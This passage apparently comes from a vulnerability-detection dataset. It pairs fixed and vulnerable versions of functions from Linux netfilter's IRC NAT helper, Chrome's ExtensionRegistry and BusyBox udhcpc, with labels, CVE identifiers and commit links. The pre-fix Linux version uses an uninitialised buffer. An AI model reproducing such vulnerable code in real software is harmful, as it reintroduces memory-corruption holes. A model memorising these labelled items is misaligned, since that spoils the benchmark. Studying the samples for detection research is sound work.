we can safely use strlen(buffer) in nf_nat_mangle_tcp_packet() and prevent a buffer overflow. Also simplify some code as we now have ct variable anyway. [1] http://www.irchelp.org/irchelp/rfc/ctcpspec.html Fixes: 5901b6be885e ("netfilter: nf_nat: support IPv6 in IRC NAT helper") Signed-off-by: Daniel Borkmann <[email protected]> Cc: Harald Welte <[email protected]> Signed-off-by: Pablo Neira Ayuso <[email protected]>
static unsigned int help(struct sk_buff *skb, enum ip_conntrack_info ctinfo, unsigned int protoff, unsigned int matchoff, unsigned int matchlen, struct nf_conntrack_expect *exp) { char buffer[sizeof("4294967296 65635")]; struct nf_conn *ct = exp->master; union nf_inet_addr newaddr; u_int16_t port; unsigned int ret; /* Reply comes from server. */ newaddr = ct->tuplehash[IP_CT_DIR_REPLY].tuple.dst.u3; exp->saved_proto.tcp.port = exp->tuple.dst.u.tcp.port; exp->dir = IP_CT_DIR_REPLY; exp->expectfn = nf_nat_follow_master; /* Try to get same port: if not, try to change it. */ for (port = ntohs(exp->saved_proto.tcp.port); port != 0; port++) { int ret; exp->tuple.dst.u.tcp.port = htons(port); ret = nf_ct_expect_related(exp); if (ret == 0) break; else if (ret != -EBUSY) { port = 0; break; } } if (port == 0) { nf_ct_helper_log(skb, ct, "all ports in use"); return NF_DROP; } /* strlen("\1DCC CHAT chat AAAAAAAA P\1\n")=27 * strlen("\1DCC SCHAT chat AAAAAAAA P\1\n")=28 * strlen("\1DCC SEND F AAAAAAAA P S\1\n")=26 * strlen("\1DCC MOVE F AAAAAAAA P S\1\n")=26 * strlen("\1DCC TSEND F AAAAAAAA P S\1\n")=27 * * AAAAAAAAA: bound addr (1.0.0.0==16777216, min 8 digits, * 255.255.255.255==4294967296, 10 digits) * P: bound port (min 1 d, max 5d (65635)) * F: filename (min 1 d ) * S: size (min 1 d ) * 0x01, \n: terminators */ /* AAA = "us", ie. where server normally talks to. */ snprintf(buffer, sizeof(buffer), "%u %u", ntohl(newaddr.ip), port); pr_debug("nf_nat_irc: inserting '%s' == %pI4, port %u\n", buffer, &newaddr.ip, port); ret = nf_nat_mangle_tcp_packet(skb, ct, ctinfo, protoff, matchoff, matchlen, buffer, strlen(buffer)); if (ret != NF_ACCEPT) { nf_ct_helper_log(skb, ct, "cannot mangle packet"); nf_ct_unexpect_related(exp); } return ret; }
static unsigned int help(struct sk_buff *skb, enum ip_conntrack_info ctinfo, unsigned int protoff, unsigned int matchoff, unsigned int matchlen, struct nf_conntrack_expect *exp) { char buffer[sizeof("4294967296 65635")]; u_int16_t port; unsigned int ret; /* Reply comes from server. */ exp->saved_proto.tcp.port = exp->tuple.dst.u.tcp.port; exp->dir = IP_CT_DIR_REPLY; exp->expectfn = nf_nat_follow_master; /* Try to get same port: if not, try to change it. */ for (port = ntohs(exp->saved_proto.tcp.port); port != 0; port++) { int ret; exp->tuple.dst.u.tcp.port = htons(port); ret = nf_ct_expect_related(exp); if (ret == 0) break; else if (ret != -EBUSY) { port = 0; break; } } if (port == 0) { nf_ct_helper_log(skb, exp->master, "all ports in use"); return NF_DROP; } ret = nf_nat_mangle_tcp_packet(skb, exp->master, ctinfo, protoff, matchoff, matchlen, buffer, strlen(buffer)); if (ret != NF_ACCEPT) { nf_ct_helper_log(skb, exp->master, "cannot mangle packet"); nf_ct_unexpect_related(exp); } return ret; }
C
linux
1
CVE-2013-6644
https://www.cvedetails.com/cve/CVE-2013-6644/
null
https://github.com/chromium/chromium/commit/db93178bcaaf7e99ebb18bd51fa99b2feaf47e1f
db93178bcaaf7e99ebb18bd51fa99b2feaf47e1f
[Extensions] Add GetInstalledExtension() method to ExtensionRegistry This CL adds GetInstalledExtension() method to ExtensionRegistry and uses it instead of deprecated ExtensionService::GetInstalledExtension() in chrome/browser/ui/app_list/. Part of removing the deprecated GetInstalledExtension() call from the ExtensionService. BUG=489687 Review URL: https://codereview.chromium.org/1130353010 Cr-Commit-Position: refs/heads/master@{#333036}
const Extension* ExtensionRegistry::GetExtensionById(const std::string& id, int include_mask) const { std::string lowercase_id = base::StringToLowerASCII(id); if (include_mask & ENABLED) { const Extension* extension = enabled_extensions_.GetByID(lowercase_id); if (extension) return extension; } if (include_mask & DISABLED) { const Extension* extension = disabled_extensions_.GetByID(lowercase_id); if (extension) return extension; } if (include_mask & TERMINATED) { const Extension* extension = terminated_extensions_.GetByID(lowercase_id); if (extension) return extension; } if (include_mask & BLACKLISTED) { const Extension* extension = blacklisted_extensions_.GetByID(lowercase_id); if (extension) return extension; } if (include_mask & BLOCKED) { const Extension* extension = blocked_extensions_.GetByID(lowercase_id); if (extension) return extension; } return NULL; }
const Extension* ExtensionRegistry::GetExtensionById(const std::string& id, int include_mask) const { std::string lowercase_id = base::StringToLowerASCII(id); if (include_mask & ENABLED) { const Extension* extension = enabled_extensions_.GetByID(lowercase_id); if (extension) return extension; } if (include_mask & DISABLED) { const Extension* extension = disabled_extensions_.GetByID(lowercase_id); if (extension) return extension; } if (include_mask & TERMINATED) { const Extension* extension = terminated_extensions_.GetByID(lowercase_id); if (extension) return extension; } if (include_mask & BLACKLISTED) { const Extension* extension = blacklisted_extensions_.GetByID(lowercase_id); if (extension) return extension; } if (include_mask & BLOCKED) { const Extension* extension = blocked_extensions_.GetByID(lowercase_id); if (extension) return extension; } return NULL; }
C
Chrome
0
CVE-2016-2148
https://www.cvedetails.com/cve/CVE-2016-2148/
CWE-119
https://git.busybox.net/busybox/commit/?id=352f79acbd759c14399e39baef21fc4ffe180ac2
352f79acbd759c14399e39baef21fc4ffe180ac2
null
int udhcpc_main(int argc UNUSED_PARAM, char **argv) { uint8_t *message; const char *str_V, *str_h, *str_F, *str_r; IF_FEATURE_UDHCPC_ARPING(const char *str_a = "2000";) IF_FEATURE_UDHCP_PORT(char *str_P;) void *clientid_mac_ptr; llist_t *list_O = NULL; llist_t *list_x = NULL; int tryagain_timeout = 20; int discover_timeout = 3; int discover_retries = 3; uint32_t server_addr = server_addr; /* for compiler */ uint32_t requested_ip = 0; uint32_t xid = xid; /* for compiler */ int packet_num; int timeout; /* must be signed */ unsigned already_waited_sec; unsigned opt; IF_FEATURE_UDHCPC_ARPING(unsigned arpping_ms;) int max_fd; int retval; fd_set rfds; /* Default options */ IF_FEATURE_UDHCP_PORT(SERVER_PORT = 67;) IF_FEATURE_UDHCP_PORT(CLIENT_PORT = 68;) client_config.interface = "eth0"; client_config.script = CONFIG_UDHCPC_DEFAULT_SCRIPT; str_V = "udhcp "BB_VER; /* Parse command line */ /* O,x: list; -T,-t,-A take numeric param */ opt_complementary = "O::x::T+:t+:A+" IF_UDHCP_VERBOSE(":vv") ; IF_LONG_OPTS(applet_long_options = udhcpc_longopts;) opt = getopt32(argv, "CV:H:h:F:i:np:qRr:s:T:t:SA:O:ox:fB" USE_FOR_MMU("b") IF_FEATURE_UDHCPC_ARPING("a::") IF_FEATURE_UDHCP_PORT("P:") "v" , &str_V, &str_h, &str_h, &str_F , &client_config.interface, &client_config.pidfile, &str_r /* i,p */ , &client_config.script /* s */ , &discover_timeout, &discover_retries, &tryagain_timeout /* T,t,A */ , &list_O , &list_x IF_FEATURE_UDHCPC_ARPING(, &str_a) IF_FEATURE_UDHCP_PORT(, &str_P) IF_UDHCP_VERBOSE(, &dhcp_verbose) ); if (opt & (OPT_h|OPT_H)) { bb_error_msg("option -h NAME is deprecated, use -x hostname:NAME"); client_config.hostname = alloc_dhcp_option(DHCP_HOST_NAME, str_h, 0); } if (opt & OPT_F) { /* FQDN option format: [0x51][len][flags][0][0]<fqdn> */ client_config.fqdn = alloc_dhcp_option(DHCP_FQDN, str_F, 3); /* Flag bits: 0000NEOS * S: 1 = Client requests server to update A RR in DNS as well as PTR * O: 1 = Server indicates to client that DNS has been updated regardless * E: 1 = Name is in DNS format, i.e. <4>host<6>domain<3>com<0>, * not "host.domain.com". Format 0 is obsolete. * N: 1 = Client requests server to not update DNS (S must be 0 then) * Two [0] bytes which follow are deprecated and must be 0. */ client_config.fqdn[OPT_DATA + 0] = 0x1; /*client_config.fqdn[OPT_DATA + 1] = 0; - xzalloc did it */ /*client_config.fqdn[OPT_DATA + 2] = 0; */ } if (opt & OPT_r) requested_ip = inet_addr(str_r); #if ENABLE_FEATURE_UDHCP_PORT if (opt & OPT_P) { CLIENT_PORT = xatou16(str_P); SERVER_PORT = CLIENT_PORT - 1; } #endif IF_FEATURE_UDHCPC_ARPING(arpping_ms = xatou(str_a);) while (list_O) { char *optstr = llist_pop(&list_O); unsigned n = bb_strtou(optstr, NULL, 0); if (errno || n > 254) { n = udhcp_option_idx(optstr); n = dhcp_optflags[n].code; } client_config.opt_mask[n >> 3] |= 1 << (n & 7); } if (!(opt & OPT_o)) { unsigned i, n; for (i = 0; (n = dhcp_optflags[i].code) != 0; i++) { if (dhcp_optflags[i].flags & OPTION_REQ) { client_config.opt_mask[n >> 3] |= 1 << (n & 7); } } } while (list_x) { char *optstr = llist_pop(&list_x); char *colon = strchr(optstr, ':'); if (colon) *colon = ' '; /* now it looks similar to udhcpd's config file line: * "optname optval", using the common routine: */ udhcp_str2optset(optstr, &client_config.options); } if (udhcp_read_interface(client_config.interface, &client_config.ifindex, NULL, client_config.client_mac) ) { return 1; } clientid_mac_ptr = NULL; if (!(opt & OPT_C) && !udhcp_find_option(client_config.options, DHCP_CLIENT_ID)) { /* not suppressed and not set, set the default client ID */ client_config.clientid = alloc_dhcp_option(DHCP_CLIENT_ID, "", 7); client_config.clientid[OPT_DATA] = 1; /* type: ethernet */ clientid_mac_ptr = client_config.clientid + OPT_DATA+1; memcpy(clientid_mac_ptr, client_config.client_mac, 6); } if (str_V[0] != '\0') { client_config.vendorclass = alloc_dhcp_option(DHCP_VENDOR, str_V, 0); } #if !BB_MMU /* on NOMMU reexec (i.e., background) early */ if (!(opt & OPT_f)) { bb_daemonize_or_rexec(0 /* flags */, argv); logmode = LOGMODE_NONE; } #endif if (opt & OPT_S) { openlog(applet_name, LOG_PID, LOG_DAEMON); logmode |= LOGMODE_SYSLOG; } /* Make sure fd 0,1,2 are open */ bb_sanitize_stdio(); /* Equivalent of doing a fflush after every \n */ setlinebuf(stdout); /* Create pidfile */ write_pidfile(client_config.pidfile); /* Goes to stdout (unless NOMMU) and possibly syslog */ bb_info_msg("%s (v"BB_VER") started", applet_name); /* Set up the signal pipe */ udhcp_sp_setup(); /* We want random_xid to be random... */ srand(monotonic_us()); state = INIT_SELECTING; udhcp_run_script(NULL, "deconfig"); change_listen_mode(LISTEN_RAW); packet_num = 0; timeout = 0; already_waited_sec = 0; /* Main event loop. select() waits on signal pipe and possibly * on sockfd. * "continue" statements in code below jump to the top of the loop. */ for (;;) { struct timeval tv; struct dhcp_packet packet; /* silence "uninitialized!" warning */ unsigned timestamp_before_wait = timestamp_before_wait; /* Was opening raw or udp socket here * if (listen_mode != LISTEN_NONE && sockfd < 0), * but on fast network renew responses return faster * than we open sockets. Thus this code is moved * to change_listen_mode(). Thus we open listen socket * BEFORE we send renew request (see "case BOUND:"). */ max_fd = udhcp_sp_fd_set(&rfds, sockfd); tv.tv_sec = timeout - already_waited_sec; tv.tv_usec = 0; retval = 0; /* If we already timed out, fall through with retval = 0, else... */ if ((int)tv.tv_sec > 0) { log1("Waiting on select %u seconds", (int)tv.tv_sec); timestamp_before_wait = (unsigned)monotonic_sec(); retval = select(max_fd + 1, &rfds, NULL, NULL, &tv); if (retval < 0) { /* EINTR? A signal was caught, don't panic */ if (errno == EINTR) { already_waited_sec += (unsigned)monotonic_sec() - timestamp_before_wait; continue; } /* Else: an error occured, panic! */ bb_perror_msg_and_die("select"); } } /* If timeout dropped to zero, time to become active: * resend discover/renew/whatever */ if (retval == 0) { /* When running on a bridge, the ifindex may have changed * (e.g. if member interfaces were added/removed * or if the status of the bridge changed). * Refresh ifindex and client_mac: */ if (udhcp_read_interface(client_config.interface, &client_config.ifindex, NULL, client_config.client_mac) ) { goto ret0; /* iface is gone? */ } if (clientid_mac_ptr) memcpy(clientid_mac_ptr, client_config.client_mac, 6); /* We will restart the wait in any case */ already_waited_sec = 0; switch (state) { case INIT_SELECTING: if (!discover_retries || packet_num < discover_retries) { if (packet_num == 0) xid = random_xid(); /* broadcast */ send_discover(xid, requested_ip); timeout = discover_timeout; packet_num++; continue; } leasefail: udhcp_run_script(NULL, "leasefail"); #if BB_MMU /* -b is not supported on NOMMU */ if (opt & OPT_b) { /* background if no lease */ bb_info_msg("No lease, forking to background"); client_background(); /* do not background again! */ opt = ((opt & ~OPT_b) | OPT_f); } else #endif if (opt & OPT_n) { /* abort if no lease */ bb_info_msg("No lease, failing"); retval = 1; goto ret; } /* wait before trying again */ timeout = tryagain_timeout; packet_num = 0; continue; case REQUESTING: if (!discover_retries || packet_num < discover_retries) { /* send broadcast select packet */ send_select(xid, server_addr, requested_ip); timeout = discover_timeout; packet_num++; continue; } /* Timed out, go back to init state. * "discover...select...discover..." loops * were seen in the wild. Treat them similarly * to "no response to discover" case */ change_listen_mode(LISTEN_RAW); state = INIT_SELECTING; goto leasefail; case BOUND: /* 1/2 lease passed, enter renewing state */ state = RENEWING; client_config.first_secs = 0; /* make secs field count from 0 */ change_listen_mode(LISTEN_KERNEL); log1("Entering renew state"); /* fall right through */ case RENEW_REQUESTED: /* manual (SIGUSR1) renew */ case_RENEW_REQUESTED: case RENEWING: if (timeout > 60) { /* send an unicast renew request */ /* Sometimes observed to fail (EADDRNOTAVAIL) to bind * a new UDP socket for sending inside send_renew. * I hazard to guess existing listening socket * is somehow conflicting with it, but why is it * not deterministic then?! Strange. * Anyway, it does recover by eventually failing through * into INIT_SELECTING state. */ send_renew(xid, server_addr, requested_ip); timeout >>= 1; continue; } /* Timed out, enter rebinding state */ log1("Entering rebinding state"); state = REBINDING; /* fall right through */ case REBINDING: /* Switch to bcast receive */ change_listen_mode(LISTEN_RAW); /* Lease is *really* about to run out, * try to find DHCP server using broadcast */ if (timeout > 0) { /* send a broadcast renew request */ send_renew(xid, 0 /*INADDR_ANY*/, requested_ip); timeout >>= 1; continue; } /* Timed out, enter init state */ bb_info_msg("Lease lost, entering init state"); udhcp_run_script(NULL, "deconfig"); state = INIT_SELECTING; client_config.first_secs = 0; /* make secs field count from 0 */ /*timeout = 0; - already is */ packet_num = 0; continue; /* case RELEASED: */ } /* yah, I know, *you* say it would never happen */ timeout = INT_MAX; continue; /* back to main loop */ } /* if select timed out */ /* select() didn't timeout, something happened */ /* Is it a signal? */ /* note: udhcp_sp_read checks FD_ISSET before reading */ switch (udhcp_sp_read(&rfds)) { case SIGUSR1: client_config.first_secs = 0; /* make secs field count from 0 */ already_waited_sec = 0; perform_renew(); if (state == RENEW_REQUESTED) { /* We might be either on the same network * (in which case renew might work), * or we might be on a completely different one * (in which case renew won't ever succeed). * For the second case, must make sure timeout * is not too big, or else we can send * futile renew requests for hours. * (Ab)use -A TIMEOUT value (usually 20 sec) * as a cap on the timeout. */ if (timeout > tryagain_timeout) timeout = tryagain_timeout; goto case_RENEW_REQUESTED; } /* Start things over */ packet_num = 0; /* Kill any timeouts, user wants this to hurry along */ timeout = 0; continue; case SIGUSR2: perform_release(server_addr, requested_ip); timeout = INT_MAX; continue; case SIGTERM: bb_info_msg("Received SIGTERM"); goto ret0; } /* Is it a packet? */ if (listen_mode == LISTEN_NONE || !FD_ISSET(sockfd, &rfds)) continue; /* no */ { int len; /* A packet is ready, read it */ if (listen_mode == LISTEN_KERNEL) len = udhcp_recv_kernel_packet(&packet, sockfd); else len = udhcp_recv_raw_packet(&packet, sockfd); if (len == -1) { /* Error is severe, reopen socket */ bb_info_msg("Read error: %s, reopening socket", strerror(errno)); sleep(discover_timeout); /* 3 seconds by default */ change_listen_mode(listen_mode); /* just close and reopen */ } /* If this packet will turn out to be unrelated/bogus, * we will go back and wait for next one. * Be sure timeout is properly decreased. */ already_waited_sec += (unsigned)monotonic_sec() - timestamp_before_wait; if (len < 0) continue; } if (packet.xid != xid) { log1("xid %x (our is %x), ignoring packet", (unsigned)packet.xid, (unsigned)xid); continue; } /* Ignore packets that aren't for us */ if (packet.hlen != 6 || memcmp(packet.chaddr, client_config.client_mac, 6) != 0 ) { log1("chaddr does not match, ignoring packet"); // log2? continue; } message = udhcp_get_option(&packet, DHCP_MESSAGE_TYPE); if (message == NULL) { bb_error_msg("no message type option, ignoring packet"); continue; } switch (state) { case INIT_SELECTING: /* Must be a DHCPOFFER */ if (*message == DHCPOFFER) { uint8_t *temp; /* What exactly is server's IP? There are several values. * Example DHCP offer captured with tchdump: * * 10.34.25.254:67 > 10.34.25.202:68 // IP header's src * BOOTP fields: * Your-IP 10.34.25.202 * Server-IP 10.34.32.125 // "next server" IP * Gateway-IP 10.34.25.254 // relay's address (if DHCP relays are in use) * DHCP options: * DHCP-Message Option 53, length 1: Offer * Server-ID Option 54, length 4: 10.34.255.7 // "server ID" * Default-Gateway Option 3, length 4: 10.34.25.254 // router * * We think that real server IP (one to use in renew/release) * is one in Server-ID option. But I am not 100% sure. * IP header's src and Gateway-IP (same in this example) * might work too. * "Next server" and router are definitely wrong ones to use, though... */ /* We used to ignore pcakets without DHCP_SERVER_ID. * I've got user reports from people who run "address-less" servers. * They either supply DHCP_SERVER_ID of 0.0.0.0 or don't supply it at all. * They say ISC DHCP client supports this case. */ server_addr = 0; temp = udhcp_get_option(&packet, DHCP_SERVER_ID); if (!temp) { bb_error_msg("no server ID, using 0.0.0.0"); } else { /* it IS unaligned sometimes, don't "optimize" */ move_from_unaligned32(server_addr, temp); } /*xid = packet.xid; - already is */ requested_ip = packet.yiaddr; /* enter requesting state */ state = REQUESTING; timeout = 0; packet_num = 0; already_waited_sec = 0; } continue; case REQUESTING: case RENEWING: case RENEW_REQUESTED: case REBINDING: if (*message == DHCPACK) { unsigned start; uint32_t lease_seconds; struct in_addr temp_addr; uint8_t *temp; temp = udhcp_get_option(&packet, DHCP_LEASE_TIME); if (!temp) { bb_error_msg("no lease time with ACK, using 1 hour lease"); lease_seconds = 60 * 60; } else { /* it IS unaligned sometimes, don't "optimize" */ move_from_unaligned32(lease_seconds, temp); lease_seconds = ntohl(lease_seconds); /* paranoia: must not be too small and not prone to overflows */ if (lease_seconds < 0x10) lease_seconds = 0x10; if (lease_seconds >= 0x10000000) lease_seconds = 0x0fffffff; } #if ENABLE_FEATURE_UDHCPC_ARPING if (opt & OPT_a) { /* RFC 2131 3.1 paragraph 5: * "The client receives the DHCPACK message with configuration * parameters. The client SHOULD perform a final check on the * parameters (e.g., ARP for allocated network address), and notes * the duration of the lease specified in the DHCPACK message. At this * point, the client is configured. If the client detects that the * address is already in use (e.g., through the use of ARP), * the client MUST send a DHCPDECLINE message to the server and restarts * the configuration process..." */ if (!arpping(packet.yiaddr, NULL, (uint32_t) 0, client_config.client_mac, client_config.interface, arpping_ms) ) { bb_info_msg("Offered address is in use " "(got ARP reply), declining"); send_decline(/*xid,*/ server_addr, packet.yiaddr); if (state != REQUESTING) udhcp_run_script(NULL, "deconfig"); change_listen_mode(LISTEN_RAW); state = INIT_SELECTING; client_config.first_secs = 0; /* make secs field count from 0 */ requested_ip = 0; timeout = tryagain_timeout; packet_num = 0; already_waited_sec = 0; continue; /* back to main loop */ } } #endif /* enter bound state */ temp_addr.s_addr = packet.yiaddr; bb_info_msg("Lease of %s obtained, lease time %u", inet_ntoa(temp_addr), (unsigned)lease_seconds); requested_ip = packet.yiaddr; start = monotonic_sec(); udhcp_run_script(&packet, state == REQUESTING ? "bound" : "renew"); already_waited_sec = (unsigned)monotonic_sec() - start; timeout = lease_seconds / 2; if ((unsigned)timeout < already_waited_sec) { /* Something went wrong. Back to discover state */ timeout = already_waited_sec = 0; } state = BOUND; change_listen_mode(LISTEN_NONE); if (opt & OPT_q) { /* quit after lease */ goto ret0; } /* future renew failures should not exit (JM) */ opt &= ~OPT_n; #if BB_MMU /* NOMMU case backgrounded earlier */ if (!(opt & OPT_f)) { client_background(); /* do not background again! */ opt = ((opt & ~OPT_b) | OPT_f); } #endif /* make future renew packets use different xid */ /* xid = random_xid(); ...but why bother? */ continue; /* back to main loop */ } if (*message == DHCPNAK) { /* If network has more than one DHCP server, * "wrong" server can reply first, with a NAK. * Do not interpret it as a NAK from "our" server. */ if (server_addr != 0) { uint32_t svid; uint8_t *temp; temp = udhcp_get_option(&packet, DHCP_SERVER_ID); if (!temp) { non_matching_svid: log1("%s with wrong server ID, ignoring packet", "Received DHCP NAK" ); continue; } move_from_unaligned32(svid, temp); if (svid != server_addr) goto non_matching_svid; } /* return to init state */ bb_info_msg("Received DHCP NAK"); udhcp_run_script(&packet, "nak"); if (state != REQUESTING) udhcp_run_script(NULL, "deconfig"); change_listen_mode(LISTEN_RAW); sleep(3); /* avoid excessive network traffic */ state = INIT_SELECTING; client_config.first_secs = 0; /* make secs field count from 0 */ requested_ip = 0; timeout = 0; packet_num = 0; already_waited_sec = 0; } continue; /* case BOUND: - ignore all packets */ /* case RELEASED: - ignore all packets */ } /* back to main loop */ } /* for (;;) - main loop ends */ ret0: if (opt & OPT_R) /* release on quit */ perform_release(server_addr, requested_ip); retval = 0; ret: /*if (client_config.pidfile) - remove_pidfile has its own check */ remove_pidfile(client_config.pidfile); return retval; }
int udhcpc_main(int argc UNUSED_PARAM, char **argv) { uint8_t *message; const char *str_V, *str_h, *str_F, *str_r; IF_FEATURE_UDHCPC_ARPING(const char *str_a = "2000";) IF_FEATURE_UDHCP_PORT(char *str_P;) void *clientid_mac_ptr; llist_t *list_O = NULL; llist_t *list_x = NULL; int tryagain_timeout = 20; int discover_timeout = 3; int discover_retries = 3; uint32_t server_addr = server_addr; /* for compiler */ uint32_t requested_ip = 0; uint32_t xid = xid; /* for compiler */ int packet_num; int timeout; /* must be signed */ unsigned already_waited_sec; unsigned opt; IF_FEATURE_UDHCPC_ARPING(unsigned arpping_ms;) int max_fd; int retval; fd_set rfds; /* Default options */ IF_FEATURE_UDHCP_PORT(SERVER_PORT = 67;) IF_FEATURE_UDHCP_PORT(CLIENT_PORT = 68;) client_config.interface = "eth0"; client_config.script = CONFIG_UDHCPC_DEFAULT_SCRIPT; str_V = "udhcp "BB_VER; /* Parse command line */ /* O,x: list; -T,-t,-A take numeric param */ opt_complementary = "O::x::T+:t+:A+" IF_UDHCP_VERBOSE(":vv") ; IF_LONG_OPTS(applet_long_options = udhcpc_longopts;) opt = getopt32(argv, "CV:H:h:F:i:np:qRr:s:T:t:SA:O:ox:fB" USE_FOR_MMU("b") IF_FEATURE_UDHCPC_ARPING("a::") IF_FEATURE_UDHCP_PORT("P:") "v" , &str_V, &str_h, &str_h, &str_F , &client_config.interface, &client_config.pidfile, &str_r /* i,p */ , &client_config.script /* s */ , &discover_timeout, &discover_retries, &tryagain_timeout /* T,t,A */ , &list_O , &list_x IF_FEATURE_UDHCPC_ARPING(, &str_a) IF_FEATURE_UDHCP_PORT(, &str_P) IF_UDHCP_VERBOSE(, &dhcp_verbose) ); if (opt & (OPT_h|OPT_H)) { bb_error_msg("option -h NAME is deprecated, use -x hostname:NAME"); client_config.hostname = alloc_dhcp_option(DHCP_HOST_NAME, str_h, 0); } if (opt & OPT_F) { /* FQDN option format: [0x51][len][flags][0][0]<fqdn> */ client_config.fqdn = alloc_dhcp_option(DHCP_FQDN, str_F, 3); /* Flag bits: 0000NEOS * S: 1 = Client requests server to update A RR in DNS as well as PTR * O: 1 = Server indicates to client that DNS has been updated regardless * E: 1 = Name is in DNS format, i.e. <4>host<6>domain<3>com<0>, * not "host.domain.com". Format 0 is obsolete. * N: 1 = Client requests server to not update DNS (S must be 0 then) * Two [0] bytes which follow are deprecated and must be 0. */ client_config.fqdn[OPT_DATA + 0] = 0x1; /*client_config.fqdn[OPT_DATA + 1] = 0; - xzalloc did it */ /*client_config.fqdn[OPT_DATA + 2] = 0; */ } if (opt & OPT_r) requested_ip = inet_addr(str_r); #if ENABLE_FEATURE_UDHCP_PORT if (opt & OPT_P) { CLIENT_PORT = xatou16(str_P); SERVER_PORT = CLIENT_PORT - 1; } #endif IF_FEATURE_UDHCPC_ARPING(arpping_ms = xatou(str_a);) while (list_O) { char *optstr = llist_pop(&list_O); unsigned n = bb_strtou(optstr, NULL, 0); if (errno || n > 254) { n = udhcp_option_idx(optstr); n = dhcp_optflags[n].code; } client_config.opt_mask[n >> 3] |= 1 << (n & 7); } if (!(opt & OPT_o)) { unsigned i, n; for (i = 0; (n = dhcp_optflags[i].code) != 0; i++) { if (dhcp_optflags[i].flags & OPTION_REQ) { client_config.opt_mask[n >> 3] |= 1 << (n & 7); } } } while (list_x) { char *optstr = llist_pop(&list_x); char *colon = strchr(optstr, ':'); if (colon) *colon = ' '; /* now it looks similar to udhcpd's config file line: * "optname optval", using the common routine: */ udhcp_str2optset(optstr, &client_config.options); } if (udhcp_read_interface(client_config.interface, &client_config.ifindex, NULL, client_config.client_mac) ) { return 1; } clientid_mac_ptr = NULL; if (!(opt & OPT_C) && !udhcp_find_option(client_config.options, DHCP_CLIENT_ID)) { /* not suppressed and not set, set the default client ID */ client_config.clientid = alloc_dhcp_option(DHCP_CLIENT_ID, "", 7); client_config.clientid[OPT_DATA] = 1; /* type: ethernet */ clientid_mac_ptr = client_config.clientid + OPT_DATA+1; memcpy(clientid_mac_ptr, client_config.client_mac, 6); } if (str_V[0] != '\0') { client_config.vendorclass = alloc_dhcp_option(DHCP_VENDOR, str_V, 0); } #if !BB_MMU /* on NOMMU reexec (i.e., background) early */ if (!(opt & OPT_f)) { bb_daemonize_or_rexec(0 /* flags */, argv); logmode = LOGMODE_NONE; } #endif if (opt & OPT_S) { openlog(applet_name, LOG_PID, LOG_DAEMON); logmode |= LOGMODE_SYSLOG; } /* Make sure fd 0,1,2 are open */ bb_sanitize_stdio(); /* Equivalent of doing a fflush after every \n */ setlinebuf(stdout); /* Create pidfile */ write_pidfile(client_config.pidfile); /* Goes to stdout (unless NOMMU) and possibly syslog */ bb_info_msg("%s (v"BB_VER") started", applet_name); /* Set up the signal pipe */ udhcp_sp_setup(); /* We want random_xid to be random... */ srand(monotonic_us()); state = INIT_SELECTING; udhcp_run_script(NULL, "deconfig"); change_listen_mode(LISTEN_RAW); packet_num = 0; timeout = 0; already_waited_sec = 0; /* Main event loop. select() waits on signal pipe and possibly * on sockfd. * "continue" statements in code below jump to the top of the loop. */ for (;;) { struct timeval tv; struct dhcp_packet packet; /* silence "uninitialized!" warning */ unsigned timestamp_before_wait = timestamp_before_wait; /* Was opening raw or udp socket here * if (listen_mode != LISTEN_NONE && sockfd < 0), * but on fast network renew responses return faster * than we open sockets. Thus this code is moved * to change_listen_mode(). Thus we open listen socket * BEFORE we send renew request (see "case BOUND:"). */ max_fd = udhcp_sp_fd_set(&rfds, sockfd); tv.tv_sec = timeout - already_waited_sec; tv.tv_usec = 0; retval = 0; /* If we already timed out, fall through with retval = 0, else... */ if ((int)tv.tv_sec > 0) { log1("Waiting on select %u seconds", (int)tv.tv_sec); timestamp_before_wait = (unsigned)monotonic_sec(); retval = select(max_fd + 1, &rfds, NULL, NULL, &tv); if (retval < 0) { /* EINTR? A signal was caught, don't panic */ if (errno == EINTR) { already_waited_sec += (unsigned)monotonic_sec() - timestamp_before_wait; continue; } /* Else: an error occured, panic! */ bb_perror_msg_and_die("select"); } } /* If timeout dropped to zero, time to become active: * resend discover/renew/whatever */ if (retval == 0) { /* When running on a bridge, the ifindex may have changed * (e.g. if member interfaces were added/removed * or if the status of the bridge changed). * Refresh ifindex and client_mac: */ if (udhcp_read_interface(client_config.interface, &client_config.ifindex, NULL, client_config.client_mac) ) { goto ret0; /* iface is gone? */ } if (clientid_mac_ptr) memcpy(clientid_mac_ptr, client_config.client_mac, 6); /* We will restart the wait in any case */ already_waited_sec = 0; switch (state) { case INIT_SELECTING: if (!discover_retries || packet_num < discover_retries) { if (packet_num == 0) xid = random_xid(); /* broadcast */ send_discover(xid, requested_ip); timeout = discover_timeout; packet_num++; continue; } leasefail: udhcp_run_script(NULL, "leasefail"); #if BB_MMU /* -b is not supported on NOMMU */ if (opt & OPT_b) { /* background if no lease */ bb_info_msg("No lease, forking to background"); client_background(); /* do not background again! */ opt = ((opt & ~OPT_b) | OPT_f); } else #endif if (opt & OPT_n) { /* abort if no lease */ bb_info_msg("No lease, failing"); retval = 1; goto ret; } /* wait before trying again */ timeout = tryagain_timeout; packet_num = 0; continue; case REQUESTING: if (!discover_retries || packet_num < discover_retries) { /* send broadcast select packet */ send_select(xid, server_addr, requested_ip); timeout = discover_timeout; packet_num++; continue; } /* Timed out, go back to init state. * "discover...select...discover..." loops * were seen in the wild. Treat them similarly * to "no response to discover" case */ change_listen_mode(LISTEN_RAW); state = INIT_SELECTING; goto leasefail; case BOUND: /* 1/2 lease passed, enter renewing state */ state = RENEWING; client_config.first_secs = 0; /* make secs field count from 0 */ change_listen_mode(LISTEN_KERNEL); log1("Entering renew state"); /* fall right through */ case RENEW_REQUESTED: /* manual (SIGUSR1) renew */ case_RENEW_REQUESTED: case RENEWING: if (timeout > 60) { /* send an unicast renew request */ /* Sometimes observed to fail (EADDRNOTAVAIL) to bind * a new UDP socket for sending inside send_renew. * I hazard to guess existing listening socket * is somehow conflicting with it, but why is it * not deterministic then?! Strange. * Anyway, it does recover by eventually failing through * into INIT_SELECTING state. */ send_renew(xid, server_addr, requested_ip); timeout >>= 1; continue; } /* Timed out, enter rebinding state */ log1("Entering rebinding state"); state = REBINDING; /* fall right through */ case REBINDING: /* Switch to bcast receive */ change_listen_mode(LISTEN_RAW); /* Lease is *really* about to run out, * try to find DHCP server using broadcast */ if (timeout > 0) { /* send a broadcast renew request */ send_renew(xid, 0 /*INADDR_ANY*/, requested_ip); timeout >>= 1; continue; } /* Timed out, enter init state */ bb_info_msg("Lease lost, entering init state"); udhcp_run_script(NULL, "deconfig"); state = 